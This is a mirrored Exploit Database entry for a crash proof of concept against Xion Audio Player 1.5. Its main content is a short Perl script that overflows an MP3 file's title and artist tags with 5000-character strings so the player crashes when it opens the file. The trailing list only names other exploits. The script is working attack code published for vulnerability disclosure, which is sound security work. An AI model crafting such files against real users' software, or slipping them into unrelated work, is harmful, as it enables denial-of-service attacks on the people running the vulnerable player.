Xion Audio Player 1.5 (build 160) – ‘.mp3’ Crash (PoC)

Exploit Database
86 阅读

作者： Charley Celice

日期： 2016-04-04
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/39654/

# Exploit Title: Xion Audio Player <= 1.5 (build 160) - Crash PoC
# Date: 01-04-2016
# Software Link: http://www.r2.com.au/downloads/files/xion-audio-player-v1.5b160.zip
# Homepage: http://www.xionplayer.com/
# Exploit Author: Charley Celice (stmerry)
# Contact: https://twitter.com/charleycelice
#
# Category: Crash PoC
# Tested on: Windows XP SP3 English
# Details: Overflowing title/artist tags on an *.mp3 seems to crash the software.
# (works on both standalone/portable versions)

use MP3::Tag;

$mp3 = MP3::Tag->new('legit.mp3'); # whatever mp3 you got handy

$mp3->title_set('A' x 5000); # title/artist tags
$mp3->artist_set('A' x 5000); # may vary although both seems to be needed

$mp3->update_tags();
$mp3->close();

print "[*] Completed.\n";

last Exploits
Xion Audio Player 1.5 (build 160) – ‘.mp3’ Crash (PoC)的更多信息

IrfanView JLS Formats PlugIn – Heap Overflow：
Adobe Flash – Use-After-Free When Setting Stage：
Softros LAN Messenger 9.2 – Denial of Service (PoC)：
Apple WebKit – ‘table’ Use-After-Free：
Microsoft Windows – ‘ATMFD.DLL’ CFF table (ATMFD+0x34072 / ATMFD+0x3407b) Invalid Memory Access：
Adobe Flash Player 22.0.0.192 – DefineBitsJPEG2 Memory Corruption：
KeePass 2.44 – Denial of Service (PoC)：
River Past Audio Converter 7.7.16 – Denial of Service (PoC)：